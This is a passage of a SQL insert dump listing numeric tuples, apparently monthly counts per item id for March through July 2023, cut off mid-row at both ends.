9,1,'202303',4),(4546,1,'202303',4),(4556,1,'202303',4),(4566,1,'202303',4),(4685,1,'202303',4),(4688,1,'202303',4),(4771,1,'202303',4),(4878,1,'202303',4),(4983,1,'202303',4),(5020,1,'202303',4),(5042,1,'202303',4),(5050,1,'202303',4),(5248,1,'202303',4),(469,1,'202303',5),(471,1,'202303',5),(473,1,'202303',5),(479,1,'202303',5),(480,1,'202303',5),(481,1,'202303',5),(1703,1,'202303',5),(1751,1,'202303',5),(1766,1,'202303',5),(2148,1,'202303',5),(2178,1,'202303',5),(2293,1,'202303',5),(2704,1,'202303',5),(2956,1,'202303',5),(3066,1,'202303',5),(3092,1,'202303',5),(3247,1,'202303',5),(3259,1,'202303',5),(3307,1,'202303',5),(3489,1,'202303',5),(3710,1,'202303',5),(3714,1,'202303',5),(4323,1,'202303',5),(4326,1,'202303',5),(4341,1,'202303',5),(4420,1,'202303',5),(4448,1,'202303',5),(4454,1,'202303',5),(4524,1,'202303',5),(4551,1,'202303',5),(4587,1,'202303',5),(4612,1,'202303',5),(4681,1,'202303',5),(4712,1,'202303',5),(4750,1,'202303',5),(4870,1,'202303',5),(4897,1,'202303',5),(4988,1,'202303',5),(5024,1,'202303',5),(5028,1,'202303',5),(5067,1,'202303',5),(5071,1,'202303',5),(5122,1,'202303',5),(5125,1,'202303',5),(5153,1,'202303',5),(84,1,'202303',6),(467,1,'202303',6),(477,1,'202303',6),(1604,1,'202303',6),(1718,1,'202303',6),(1726,1,'202303',6),(1728,1,'202303',6),(2503,1,'202303',6),(2769,1,'202303',6),(2911,1,'202303',6),(3004,1,'202303',6),(3005,1,'202303',6),(3030,1,'202303',6),(3069,1,'202303',6),(3072,1,'202303',6),(3226,1,'202303',6),(3738,1,'202303',6),(4335,1,'202303',6),(4514,1,'202303',6),(4660,1,'202303',6),(4663,1,'202303',6),(4703,1,'202303',6),(4706,1,'202303',6),(4709,1,'202303',6),(4759,1,'202303',6),(4930,1,'202303',6),(5058,1,'202303',6),(5101,1,'202303',6),(5140,1,'202303',6),(5157,1,'202303',6),(74,1,'202303',7),(474,1,'202303',7),(487,1,'202303',7),(1584,1,'202303',7),(1608,1,'202303',7),(1614,1,'202303',7),(2989,1,'202303',7),(3060,1,'202303',7),(3438,1,'202303',7),(4391,1,'202303',7),(4517,1,'202303',7),(4645,1,'202303',7),(4674,1,'202303',7),(4694,1,'202303',7),(4765,1,'202303',7),(4776,1,'202303',7),(4976,1,'202303',7),(4996,1,'202303',7),(5131,1,'202303',7),(87,1,'202303',8),(108,1,'202303',8),(335,1,'202303',8),(472,1,'202303',8),(1592,1,'202303',8),(1737,1,'202303',8),(2658,1,'202303',8),(4238,1,'202303',8),(4529,1,'202303',8),(4697,1,'202303',8),(4700,1,'202303',8),(5134,1,'202303',8),(5146,1,'202303',8),(483,1,'202303',9),(1600,1,'202303',9),(1722,1,'202303',9),(3781,1,'202303',9),(4412,1,'202303',9),(4520,1,'202303',9),(5076,1,'202303',9),(5128,1,'202303',9),(5137,1,'202303',9),(4677,1,'202303',10),(5080,1,'202303',10),(5253,1,'202303',10),(91,1,'202303',11),(470,1,'202303',11),(1598,1,'202303',11),(76,1,'202303',12),(468,1,'202303',12),(1544,1,'202303',12),(1596,1,'202303',13),(5033,1,'202303',13),(4457,1,'202303',14),(3083,1,'202303',15),(3102,1,'202303',16),(3764,1,'202303',16),(68,1,'202303',17),(1612,1,'202303',17),(5256,1,'202303',17),(2457,1,'202303',18),(1610,1,'202303',19),(1594,1,'202303',20),(2904,1,'202303',21),(1582,1,'202303',22),(1588,1,'202303',25),(5163,1,'202303',27),(1602,1,'202303',28),(72,1,'202303',30),(1586,1,'202303',34),(89,1,'202303',36),(80,1,'202303',100),(9,1,'202303',678),(106,1,'202304',1),(477,1,'202304',1),(1711,1,'202304',1),(1713,1,'202304',1),(1715,1,'202304',1),(1718,1,'202304',1),(1732,1,'202304',1),(1745,1,'202304',1),(1751,1,'202304',1),(1768,1,'202304',1),(1774,1,'202304',1),(1776,1,'202304',1),(1778,1,'202304',1),(1782,1,'202304',1),(2152,1,'202304',1),(2156,1,'202304',1),(2165,1,'202304',1),(2248,1,'202304',1),(2813,1,'202304',1),(2991,1,'202304',1),(3027,1,'202304',1),(3041,1,'202304',1),(3045,1,'202304',1),(3072,1,'202304',1),(3079,1,'202304',1),(3087,1,'202304',1),(3096,1,'202304',1),(3261,1,'202304',1),(3265,1,'202304',1),(3269,1,'202304',1),(3438,1,'202304',1),(3498,1,'202304',1),(3541,1,'202304',1),(3721,1,'202304',1),(3731,1,'202304',1),(3774,1,'202304',1),(4329,1,'202304',1),(4332,1,'202304',1),(4338,1,'202304',1),(4341,1,'202304',1),(4363,1,'202304',1),(4368,1,'202304',1),(4382,1,'202304',1),(4387,1,'202304',1),(4396,1,'202304',1),(4408,1,'202304',1),(4428,1,'202304',1),(4432,1,'202304',1),(4440,1,'202304',1),(4448,1,'202304',1),(4514,1,'202304',1),(4556,1,'202304',1),(4648,1,'202304',1),(4651,1,'202304',1),(4674,1,'202304',1),(4688,1,'202304',1),(4712,1,'202304',1),(4744,1,'202304',1),(4792,1,'202304',1),(4797,1,'202304',1),(4802,1,'202304',1),(4858,1,'202304',1),(4866,1,'202304',1),(4878,1,'202304',1),(4893,1,'202304',1),(5020,1,'202304',1),(5024,1,'202304',1),(5042,1,'202304',1),(5046,1,'202304',1),(5067,1,'202304',1),(102,1,'202304',2),(471,1,'202304',2),(478,1,'202304',2),(480,1,'202304',2),(481,1,'202304',2),(486,1,'202304',2),(488,1,'202304',2),(1590,1,'202304',2),(1697,1,'202304',2),(1705,1,'202304',2),(1720,1,'202304',2),(1739,1,'202304',2),(1741,1,'202304',2),(1747,1,'202304',2),(1749,1,'202304',2),(2148,1,'202304',2),(2150,1,'202304',2),(2161,1,'202304',2),(2178,1,'202304',2),(2252,1,'202304',2),(2293,1,'202304',2),(2296,1,'202304',2),(2769,1,'202304',2),(2911,1,'202304',2),(3023,1,'202304',2),(3124,1,'202304',2),(3226,1,'202304',2),(3243,1,'202304',2),(3245,1,'202304',2),(3251,1,'202304',2),(3259,1,'202304',2),(3275,1,'202304',2),(3278,1,'202304',2),(3280,1,'202304',2),(3282,1,'202304',2),(3285,1,'202304',2),(3287,1,'202304',2),(3297,1,'202304',2),(3307,1,'202304',2),(3482,1,'202304',2),(3486,1,'202304',2),(3714,1,'202304',2),(3724,1,'202304',2),(3735,1,'202304',2),(4275,1,'202304',2),(4323,1,'202304',2),(4335,1,'202304',2),(4357,1,'202304',2),(4377,1,'202304',2),(4400,1,'202304',2),(4517,1,'202304',2),(4551,1,'202304',2),(4566,1,'202304',2),(4582,1,'202304',2),(4587,1,'202304',2),(4591,1,'202304',2),(4608,1,'202304',2),(4657,1,'202304',2),(4703,1,'202304',2),(4756,1,'202304',2),(4762,1,'202304',2),(4771,1,'202304',2),(4897,1,'202304',2),(4983,1,'202304',2),(5128,1,'202304',2),(467,1,'202304',3),(479,1,'202304',3),(483,1,'202304',3),(485,1,'202304',3),(1584,1,'202304',3),(1614,1,'202304',3),(1699,1,'202304',3),(1701,1,'202304',3),(1707,1,'202304',3),(1726,1,'202304',3),(1730,1,'202304',3),(1734,1,'202304',3),(1743,1,'202304',3),(1780,1,'202304',3),(2063,1,'202304',3),(2558,1,'202304',3),(2748,1,'202304',3),(2751,1,'202304',3),(2775,1,'202304',3),(2964,1,'202304',3),(3005,1,'202304',3),(3006,1,'202304',3),(3038,1,'202304',3),(3097,1,'202304',3),(3104,1,'202304',3),(3229,1,'202304',3),(3240,1,'202304',3),(3253,1,'202304',3),(3257,1,'202304',3),(3267,1,'202304',3),(3271,1,'202304',3),(3316,1,'202304',3),(3479,1,'202304',3),(3531,1,'202304',3),(3534,1,'202304',3),(3738,1,'202304',3),(3742,1,'202304',3),(3777,1,'202304',3),(4420,1,'202304',3),(4424,1,'202304',3),(4454,1,'202304',3),(4668,1,'202304',3),(4691,1,'202304',3),(4694,1,'202304',3),(4706,1,'202304',3),(4741,1,'202304',3),(4750,1,'202304',3),(4768,1,'202304',3),(4862,1,'202304',3),(4870,1,'202304',3),(4976,1,'202304',3),(4996,1,'202304',3),(5028,1,'202304',3),(5050,1,'202304',3),(5054,1,'202304',3),(5140,1,'202304',3),(5146,1,'202304',3),(5264,1,'202304',3),(473,1,'202304',4),(482,1,'202304',4),(484,1,'202304',4),(1728,1,'202304',4),(1770,1,'202304',4),(1772,1,'202304',4),(2154,1,'202304',4),(2159,1,'202304',4),(2609,1,'202304',4),(2617,1,'202304',4),(2801,1,'202304',4),(2804,1,'202304',4),(2965,1,'202304',4),(3034,1,'202304',4),(3066,1,'202304',4),(3090,1,'202304',4),(3127,1,'202304',4),(3313,1,'202304',4),(3430,1,'202304',4),(3710,1,'202304',4),(3746,1,'202304',4),(4326,1,'202304',4),(4412,1,'202304',4),(4722,1,'202304',4),(4753,1,'202304',4),(4776,1,'202304',4),(4980,1,'202304',4),(5037,1,'202304',4),(5071,1,'202304',4),(5122,1,'202304',4),(5125,1,'202304',4),(5131,1,'202304',4),(5137,1,'202304',4),(74,1,'202304',5),(476,1,'202304',5),(1604,1,'202304',5),(1606,1,'202304',5),(1703,1,'202304',5),(1737,1,'202304',5),(2704,1,'202304',5),(2956,1,'202304',5),(2989,1,'202304',5),(3004,1,'202304',5),(3063,1,'202304',5),(3092,1,'202304',5),(3117,1,'202304',5),(3489,1,'202304',5),(3752,1,'202304',5),(3771,1,'202304',5),(4301,1,'202304',5),(4436,1,'202304',5),(4520,1,'202304',5),(4524,1,'202304',5),(4654,1,'202304',5),(4663,1,'202304',5),(4697,1,'202304',5),(4709,1,'202304',5),(4765,1,'202304',5),(4874,1,'202304',5),(4977,1,'202304',5),(4988,1,'202304',5),(5062,1,'202304',5),(5101,1,'202304',5),(472,1,'202304',6),(1592,1,'202304',6),(1598,1,'202304',6),(1766,1,'202304',6),(2809,1,'202304',6),(3030,1,'202304',6),(3102,1,'202304',6),(4444,1,'202304',6),(4542,1,'202304',6),(4759,1,'202304',6),(5153,1,'202304',6),(5259,1,'202304',6),(469,1,'202304',7),(1724,1,'202304',7),(2297,1,'202304',7),(2309,1,'202304',7),(3083,1,'202304',7),(4238,1,'202304',7),(4416,1,'202304',7),(4660,1,'202304',7),(5058,1,'202304',7),(5080,1,'202304',7),(5157,1,'202304',7),(5248,1,'202304',7),(335,1,'202304',8),(468,1,'202304',8),(474,1,'202304',8),(570,1,'202304',8),(1608,1,'202304',8),(2503,1,'202304',8),(2658,1,'202304',8),(3290,1,'202304',8),(4529,1,'202304',8),(4645,1,'202304',8),(4747,1,'202304',8),(5076,1,'202304',8),(5134,1,'202304',8),(108,1,'202304',9),(487,1,'202304',9),(1722,1,'202304',9),(3069,1,'202304',9),(3781,1,'202304',9),(4391,1,'202304',9),(4612,1,'202304',9),(4677,1,'202304',9),(4700,1,'202304',9),(1612,1,'202304',10),(3764,1,'202304',10),(72,1,'202304',11),(84,1,'202304',11),(87,1,'202304',11),(1596,1,'202304',11),(3060,1,'202304',11),(76,1,'202304',12),(470,1,'202304',12),(1544,1,'202304',12),(2457,1,'202304',12),(5256,1,'202304',12),(1600,1,'202304',13),(5033,1,'202304',13),(2904,1,'202304',15),(4930,1,'202304',16),(1594,1,'202304',18),(1586,1,'202304',19),(4457,1,'202304',19),(91,1,'202304',20),(1610,1,'202304',20),(1582,1,'202304',21),(5253,1,'202304',22),(68,1,'202304',24),(1588,1,'202304',24),(5268,1,'202304',24),(1602,1,'202304',26),(5163,1,'202304',33),(89,1,'202304',37),(80,1,'202304',90),(9,1,'202304',697),(482,1,'202305',1),(1697,1,'202305',1),(1699,1,'202305',1),(1726,1,'202305',1),(1732,1,'202305',1),(1743,1,'202305',1),(2248,1,'202305',1),(2558,1,'202305',1),(2748,1,'202305',1),(2801,1,'202305',1),(2956,1,'202305',1),(2991,1,'202305',1),(3267,1,'202305',1),(3287,1,'202305',1),(4591,1,'202305',1),(4668,1,'202305',1),(106,1,'202305',2),(1707,1,'202305',2),(1734,1,'202305',2),(1741,1,'202305',2),(1749,1,'202305',2),(1768,1,'202305',2),(1780,1,'202305',2),(2150,1,'202305',2),(2156,1,'202305',2),(2296,1,'202305',2),(2297,1,'202305',2),(2617,1,'202305',2),(2965,1,'202305',2),(2993,1,'202305',2),(3006,1,'202305',2),(3041,1,'202305',2),(3104,1,'202305',2),(3247,1,'202305',2),(3259,1,'202305',2),(3261,1,'202305',2),(3265,1,'202305',2),(3275,1,'202305',2),(3280,1,'202305',2),(3489,1,'202305',2),(3531,1,'202305',2),(3541,1,'202305',2),(3710,1,'202305',2),(3724,1,'202305',2),(3774,1,'202305',2),(4275,1,'202305',2),(4566,1,'202305',2),(4657,1,'202305',2),(4688,1,'202305',2),(4722,1,'202305',2),(4741,1,'202305',2),(4747,1,'202305',2),(4759,1,'202305',2),(4768,1,'202305',2),(4878,1,'202305',2),(4893,1,'202305',2),(5054,1,'202305',2),(483,1,'202305',3),(486,1,'202305',3),(1584,1,'202305',3),(1705,1,'202305',3),(1715,1,'202305',3),(1720,1,'202305',3),(1739,1,'202305',3),(1747,1,'202305',3),(1772,1,'202305',3),(1776,1,'202305',3),(1778,1,'202305',3),(1782,1,'202305',3),(2159,1,'202305',3),(2293,1,'202305',3),(2309,1,'202305',3),(2911,1,'202305',3),(2989,1,'202305',3),(3034,1,'202305',3),(3038,1,'202305',3),(3087,1,'202305',3),(3096,1,'202305',3),(3127,1,'202305',3),(3229,1,'202305',3),(3249,1,'202305',3),(3253,1,'202305',3),(3263,1,'202305',3),(3269,1,'202305',3),(3278,1,'202305',3),(3285,1,'202305',3),(3297,1,'202305',3),(3430,1,'202305',3),(3714,1,'202305',3),(3742,1,'202305',3),(3746,1,'202305',3),(4377,1,'202305',3),(4382,1,'202305',3),(4387,1,'202305',3),(4416,1,'202305',3),(4448,1,'202305',3),(4517,1,'202305',3),(4608,1,'202305',3),(4654,1,'202305',3),(4660,1,'202305',3),(4685,1,'202305',3),(4691,1,'202305',3),(4709,1,'202305',3),(4712,1,'202305',3),(4750,1,'202305',3),(4792,1,'202305',3),(4797,1,'202305',3),(4802,1,'202305',3),(4862,1,'202305',3),(4897,1,'202305',3),(4980,1,'202305',3),(4988,1,'202305',3),(5020,1,'202305',3),(102,1,'202305',4),(110,1,'202305',4),(471,1,'202305',4),(480,1,'202305',4),(481,1,'202305',4),(1590,1,'202305',4),(1695,1,'202305',4),(1701,1,'202305',4),(1703,1,'202305',4),(1709,1,'202305',4),(1711,1,'202305',4),(1718,1,'202305',4),(1722,1,'202305',4),(1751,1,'202305',4),(1774,1,'202305',4),(2152,1,'202305',4),(2154,1,'202305',4),(2161,1,'202305',4),(2165,1,'202305',4),(2775,1,'202305',4),(2804,1,'202305',4),(3004,1,'202305',4),(3063,1,'202305',4),(3072,1,'202305',4),(3079,1,'202305',4),(3092,1,'202305',4),(3107,1,'202305',4),(3117,1,'202305',4),(3243,1,'202305',4),(3245,1,'202305',4),(3251,1,'202305',4),(3257,1,'202305',4),(3271,1,'202305',4),(3273,1,'202305',4),(3282,1,'202305',4),(3290,1,'202305',4),(3316,1,'202305',4),(3438,1,'202305',4),(3482,1,'202305',4),(3486,1,'202305',4),(3534,1,'202305',4),(3749,1,'202305',4),(3752,1,'202305',4),(3771,1,'202305',4),(4301,1,'202305',4),(4335,1,'202305',4),(4363,1,'202305',4),(4368,1,'202305',4),(4391,1,'202305',4),(4396,1,'202305',4),(4400,1,'202305',4),(4408,1,'202305',4),(4424,1,'202305',4),(4432,1,'202305',4),(4440,1,'202305',4),(4514,1,'202305',4),(4524,1,'202305',4),(4542,1,'202305',4),(4546,1,'202305',4),(4556,1,'202305',4),(4582,1,'202305',4),(4587,1,'202305',4),(4612,1,'202305',4),(4648,1,'202305',4),(4651,1,'202305',4),(4681,1,'202305',4),(4703,1,'202305',4),(4744,1,'202305',4),(4753,1,'202305',4),(4866,1,'202305',4),(4870,1,'202305',4),(4888,1,'202305',4),(5024,1,'202305',4),(5028,1,'202305',4),(5037,1,'202305',4),(5046,1,'202305',4),(5050,1,'202305',4),(5058,1,'202305',4),(5153,1,'202305',4),(467,1,'202305',5),(478,1,'202305',5),(484,1,'202305',5),(485,1,'202305',5),(1745,1,'202305',5),(2609,1,'202305',5),(2769,1,'202305',5),(2964,1,'202305',5),(3005,1,'202305',5),(3023,1,'202305',5),(3090,1,'202305',5),(3097,1,'202305',5),(3109,1,'202305',5),(3226,1,'202305',5),(3313,1,'202305',5),(3721,1,'202305',5),(3727,1,'202305',5),(3735,1,'202305',5),(4323,1,'202305',5),(4329,1,'202305',5),(4332,1,'202305',5),(4373,1,'202305',5),(4428,1,'202305',5),(4444,1,'202305',5),(4674,1,'202305',5),(4756,1,'202305',5),(4858,1,'202305',5),(4874,1,'202305',5),(4883,1,'202305',5),(4983,1,'202305',5),(5140,1,'202305',5),(5146,1,'202305',5),(5248,1,'202305',5),(469,1,'202305',6),(474,1,'202305',6),(477,1,'202305',6),(570,1,'202305',6),(1713,1,'202305',6),(1724,1,'202305',6),(1728,1,'202305',6),(1737,1,'202305',6),(1770,1,'202305',6),(2148,1,'202305',6),(2751,1,'202305',6),(3069,1,'202305',6),(3124,1,'202305',6),(3240,1,'202305',6),(3479,1,'202305',6),(3777,1,'202305',6),(4326,1,'202305',6),(4341,1,'202305',6),(4404,1,'202305',6),(4420,1,'202305',6),(4436,1,'202305',6),(4454,1,'202305',6),(4706,1,'202305',6),(4762,1,'202305',6),(4776,1,'202305',6),(4996,1,'202305',6),(5067,1,'202305',6),(5101,1,'202305',6),(5131,1,'202305',6),(5157,1,'202305',6),(472,1,'202305',7),(473,1,'202305',7),(476,1,'202305',7),(479,1,'202305',7),(488,1,'202305',7),(2813,1,'202305',7),(3102,1,'202305',7),(3498,1,'202305',7),(3731,1,'202305',7),(3738,1,'202305',7),(4338,1,'202305',7),(4357,1,'202305',7),(4529,1,'202305',7),(4551,1,'202305',7),(4677,1,'202305',7),(4694,1,'202305',7),(4697,1,'202305',7),(4771,1,'202305',7),(5033,1,'202305',7),(5071,1,'202305',7),(5080,1,'202305',7),(74,1,'202305',8),(470,1,'202305',8),(1544,1,'202305',8),(1608,1,'202305',8),(1614,1,'202305',8),(1766,1,'202305',8),(3027,1,'202305',8),(3045,1,'202305',8),(3066,1,'202305',8),(3307,1,'202305',8),(4412,1,'202305',8),(4977,1,'202305',8),(5122,1,'202305',8),(5125,1,'202305',8),(468,1,'202305',9),(1598,1,'202305',9),(1604,1,'202305',9),(2178,1,'202305',9),(2457,1,'202305',9),(4645,1,'202305',9),(4663,1,'202305',9),(4700,1,'202305',9),(4765,1,'202305',9),(4976,1,'202305',9),(5062,1,'202305',9),(5134,1,'202305',9),(487,1,'202305',10),(1592,1,'202305',10),(1606,1,'202305',10),(2503,1,'202305',10),(2809,1,'202305',10),(3030,1,'202305',10),(5128,1,'202305',10),(5137,1,'202305',10),(1600,1,'202305',11),(4238,1,'202305',11),(4520,1,'202305',11),(5042,1,'202305',11),(5076,1,'202305',12),(84,1,'202305',13),(3060,1,'202305',13),(335,1,'202305',14),(3083,1,'202305',14),(4930,1,'202305',14),(2658,1,'202305',15),(5259,1,'202305',15),(5268,1,'202305',15),(5271,1,'202305',15),(87,1,'202305',16),(1594,1,'202305',16),(3781,1,'202305',16),(5163,1,'202305',16),(5264,1,'202305',16),(76,1,'202305',17),(4457,1,'202305',17),(108,1,'202305',18),(5256,1,'202305',18),(1596,1,'202305',19),(1586,1,'202305',20),(1610,1,'202305',20),(3764,1,'202305',20),(68,1,'202305',23),(1602,1,'202305',23),(1612,1,'202305',23),(5253,1,'202305',24),(1588,1,'202305',25),(91,1,'202305',26),(1582,1,'202305',27),(89,1,'202305',29),(72,1,'202305',35),(2904,1,'202305',78),(80,1,'202305',118),(9,1,'202305',698),(106,1,'202306',1),(471,1,'202306',1),(485,1,'202306',1),(1695,1,'202306',1),(1715,1,'202306',1),(1776,1,'202306',1),(2063,1,'202306',1),(2154,1,'202306',1),(2156,1,'202306',1),(2161,1,'202306',1),(2248,1,'202306',1),(2993,1,'202306',1),(3087,1,'202306',1),(3090,1,'202306',1),(3096,1,'202306',1),(3307,1,'202306',1),(3541,1,'202306',1),(4373,1,'202306',1),(4444,1,'202306',1),(4514,1,'202306',1),(4587,1,'202306',1),(4797,1,'202306',1),(4858,1,'202306',1),(4862,1,'202306',1),(4866,1,'202306',1),(5028,1,'202306',1),(5042,1,'202306',1),(5067,1,'202306',1),(5259,1,'202306',1),(5264,1,'202306',1),(110,1,'202306',2),(477,1,'202306',2),(480,1,'202306',2),(481,1,'202306',2),(1590,1,'202306',2),(1604,1,'202306',2),(1705,1,'202306',2),(1707,1,'202306',2),(1713,1,'202306',2),(1720,1,'202306',2),(1730,1,'202306',2),(1734,1,'202306',2),(1772,1,'202306',2),(1774,1,'202306',2),(1780,1,'202306',2),(1782,1,'202306',2),(2150,1,'202306',2),(3005,1,'202306',2),(3045,1,'202306',2),(3097,1,'202306',2),(3109,1,'202306',2),(3117,1,'202306',2),(3240,1,'202306',2),(3243,1,'202306',2),(3259,1,'202306',2),(3265,1,'202306',2),(3271,1,'202306',2),(3273,1,'202306',2),(3275,1,'202306',2),(3280,1,'202306',2),(3282,1,'202306',2),(3316,1,'202306',2),(3738,1,'202306',2),(4332,1,'202306',2),(4341,1,'202306',2),(4377,1,'202306',2),(4382,1,'202306',2),(4400,1,'202306',2),(4408,1,'202306',2),(4424,1,'202306',2),(4436,1,'202306',2),(4440,1,'202306',2),(4688,1,'202306',2),(4762,1,'202306',2),(4792,1,'202306',2),(4870,1,'202306',2),(4897,1,'202306',2),(4983,1,'202306',2),(5020,1,'202306',2),(5054,1,'202306',2),(5146,1,'202306',2),(467,1,'202306',3),(476,1,'202306',3),(482,1,'202306',3),(486,1,'202306',3),(1701,1,'202306',3),(1722,1,'202306',3),(1726,1,'202306',3),(1732,1,'202306',3),(1737,1,'202306',3),(1739,1,'202306',3),(1741,1,'202306',3),(1749,1,'202306',3),(1768,1,'202306',3),(2178,1,'202306',3),(2296,1,'202306',3),(2775,1,'202306',3),(3092,1,'202306',3),(3107,1,'202306',3),(3226,1,'202306',3),(3229,1,'202306',3),(3251,1,'202306',3),(3263,1,'202306',3),(3267,1,'202306',3),(3269,1,'202306',3),(3278,1,'202306',3),(3534,1,'202306',3),(3714,1,'202306',3),(3727,1,'202306',3),(3746,1,'202306',3),(3749,1,'202306',3),(4368,1,'202306',3),(4454,1,'202306',3),(4517,1,'202306',3),(4591,1,'202306',3),(4681,1,'202306',3),(4712,1,'202306',3),(4765,1,'202306',3),(4771,1,'202306',3),(4874,1,'202306',3),(4878,1,'202306',3),(4888,1,'202306',3),(4893,1,'202306',3),(5024,1,'202306',3),(5058,1,'202306',3),(5062,1,'202306',3),(5153,1,'202306',3),(5157,1,'202306',3),(5248,1,'202306',3),(473,1,'202306',4),(483,1,'202306',4),(484,1,'202306',4),(1606,1,'202306',4),(1697,1,'202306',4),(1745,1,'202306',4),(1770,1,'202306',4),(1778,1,'202306',4),(2293,1,'202306',4),(2297,1,'202306',4),(2609,1,'202306',4),(2748,1,'202306',4),(2751,1,'202306',4),(2991,1,'202306',4),(3027,1,'202306',4),(3041,1,'202306',4),(3079,1,'202306',4),(3124,1,'202306',4),(3249,1,'202306',4),(3253,1,'202306',4),(3257,1,'202306',4),(3287,1,'202306',4),(3438,1,'202306',4),(3498,1,'202306',4),(3710,1,'202306',4),(3721,1,'202306',4),(3731,1,'202306',4),(3771,1,'202306',4),(3774,1,'202306',4),(4387,1,'202306',4),(4391,1,'202306',4),(4396,1,'202306',4),(4404,1,'202306',4),(4416,1,'202306',4),(4420,1,'202306',4),(4432,1,'202306',4),(4448,1,'202306',4),(4529,1,'202306',4),(4556,1,'202306',4),(4566,1,'202306',4),(4608,1,'202306',4),(4612,1,'202306',4),(4648,1,'202306',4),(4651,1,'202306',4),(4685,1,'202306',4),(4750,1,'202306',4),(4753,1,'202306',4),(4759,1,'202306',4),(4988,1,'202306',4),(5037,1,'202306',4),(5046,1,'202306',4),(5050,1,'202306',4),(5071,1,'202306',4),(5101,1,'202306',4),(5122,1,'202306',4),(5140,1,'202306',4),(102,1,'202306',5),(472,1,'202306',5),(478,1,'202306',5),(479,1,'202306',5),(1584,1,'202306',5),(1614,1,'202306',5),(1699,1,'202306',5),(1718,1,'202306',5),(1751,1,'202306',5),(1766,1,'202306',5),(2558,1,'202306',5),(2769,1,'202306',5),(2804,1,'202306',5),(2956,1,'202306',5),(2965,1,'202306',5),(3038,1,'202306',5),(3072,1,'202306',5),(3102,1,'202306',5),(3261,1,'202306',5),(3285,1,'202306',5),(3482,1,'202306',5),(3489,1,'202306',5),(3531,1,'202306',5),(3777,1,'202306',5),(4323,1,'202306',5),(4329,1,'202306',5),(4335,1,'202306',5),(4524,1,'202306',5),(4546,1,'202306',5),(4668,1,'202306',5),(4691,1,'202306',5),(4706,1,'202306',5),(4722,1,'202306',5),(4741,1,'202306',5),(4756,1,'202306',5),(4768,1,'202306',5),(4776,1,'202306',5),(4980,1,'202306',5),(5080,1,'202306',5),(5131,1,'202306',5),(468,1,'202306',6),(469,1,'202306',6),(488,1,'202306',6),(1724,1,'202306',6),(2159,1,'202306',6),(2617,1,'202306',6),(3006,1,'202306',6),(3023,1,'202306',6),(3063,1,'202306',6),(3104,1,'202306',6),(3127,1,'202306',6),(3245,1,'202306',6),(3290,1,'202306',6),(3479,1,'202306',6),(3735,1,'202306',6),(4275,1,'202306',6),(4326,1,'202306',6),(4582,1,'202306',6),(4703,1,'202306',6),(4744,1,'202306',6),(4747,1,'202306',6),(4802,1,'202306',6),(5076,1,'202306',6),(5125,1,'202306',6),(5134,1,'202306',6),(5137,1,'202306',6),(474,1,'202306',7),(1709,1,'202306',7),(1711,1,'202306',7),(1743,1,'202306',7),(2252,1,'202306',7),(2704,1,'202306',7),(2964,1,'202306',7),(2989,1,'202306',7),(3004,1,'202306',7),(3297,1,'202306',7),(3724,1,'202306',7),(3742,1,'202306',7),(4357,1,'202306',7),(4657,1,'202306',7),(4660,1,'202306',7),(4694,1,'202306',7),(4996,1,'202306',7),(5268,1,'202306',7),(487,1,'202306',8),(570,1,'202306',8),(1592,1,'202306',8),(1703,1,'202306',8),(2457,1,'202306',8),(2911,1,'202306',8),(3034,1,'202306',8),(3430,1,'202306',8),(3486,1,'202306',8),(3752,1,'202306',8),(4412,1,'202306',8),(4542,1,'202306',8),(4709,1,'202306',8),(74,1,'202306',9),(108,1,'202306',9),(1600,1,'202306',9),(1728,1,'202306',9),(2503,1,'202306',9),(2658,1,'202306',9),(3313,1,'202306',9),(4551,1,'202306',9),(4654,1,'202306',9),(4976,1,'202306',9),(1544,1,'202306',10),(1598,1,'202306',10),(2309,1,'202306',10),(2801,1,'202306',10),(2813,1,'202306',10),(4977,1,'202306',10),(5033,1,'202306',10),(1608,1,'202306',11),(2165,1,'202306',11),(4301,1,'202306',11),(84,1,'202306',12),(1596,1,'202306',12),(1612,1,'202306',12),(3066,1,'202306',12),(4238,1,'202306',12),(4338,1,'202306',12),(4697,1,'202306',12),(4930,1,'202306',12),(470,1,'202306',13),(3781,1,'202306',13),(4674,1,'202306',13),(4700,1,'202306',13),(5128,1,'202306',13),(5253,1,'202306',13),(335,1,'202306',14),(3030,1,'202306',14),(3060,1,'202306',14),(3083,1,'202306',14),(4520,1,'202306',14),(4663,1,'202306',14),(5256,1,'202306',14),(1610,1,'202306',15),(4457,1,'202306',15),(5163,1,'202306',15),(5271,1,'202306',15),(1586,1,'202306',16),(2809,1,'202306',16),(3069,1,'202306',16),(3764,1,'202306',16),(1588,1,'202306',17),(1602,1,'202306',17),(4645,1,'202306',17),(89,1,'202306',18),(2148,1,'202306',18),(1582,1,'202306',19),(76,1,'202306',20),(1594,1,'202306',20),(4677,1,'202306',20),(91,1,'202306',22),(2904,1,'202306',22),(87,1,'202306',24),(72,1,'202306',25),(5276,1,'202306',26),(68,1,'202306',27),(80,1,'202306',102),(9,1,'202306',646),(1699,1,'202307',1),(1730,1,'202307',1),(1749,1,'202307',1),(2296,1,'202307',1),(2748,1,'202307',1),(3087,1,'202307',1),(3278,1,'202307',1),(3297,1,'202307',1),(110,1,'202307',2),(477,1,'202307',2),(1590,1,'202307',2),(1734,1,'202307',2),(1776,1,'202307',2),(1780,1,'202307',2),(2178,1,'202307',2),(2252,1,'202307',2),(2704,1,'202307',2),(2965,1,'202307',2),(2993,1,'202307',2),(3023,1,'202307',2),(3041,1,'202307',2),(3097,1,'202307',2),(3104,1,'202307',2),(3229,1,'202307',2),(3265,1,'202307',2),(3285,1,'202307',2),(3486,1,'202307',2),(3541,1,'202307',2),(3727,1,'202307',2),(3731,1,'202307',2),(3742,1,'202307',2),(3752,1,'202307',2),(4377,1,'202307',2),(4382,1,'202307',2),(4408,1,'202307',2),(4432,1,'202307',2),(4608,1,'202307',2),(4612,1,'202307',2),(4654,1,'202307',2),(4668,1,'202307',2),(5058,1,'202307',2),(5248,1,'202307',2),(102,1,'202307',3),(481,1,'202307',3),(482,1,'202307',3),(1584,1,'202307',3),(1695,1,'202307',3),(1697,1,'202307',3),(1705,1,'202307',3),(1709,1,'202307',3),(1711,1,'202307',3),(1715,1,'202307',3),(1720,1,'202307',3),(1741,1,'202307',3),(1751,1,'202307',3),(1772,1,'202307',3),(1782,1,'202307',3),(2063,1,'202307',3),(2156,1,'202307',3),(2248,1,'202307',3),(2558,1,'202307',3),(2769,1,'202307',3),(2991,1,'202307',3),(3027,1,'202307',3),(3034,1,'202307',3),(3069,1,'202307',3),(3124,1,'202307',3),(3249,1,'202307',3),(3251,1,'202307',3),(3259,1,'202307',3),(3267,1,'202307',3),(3271,1,'202307',3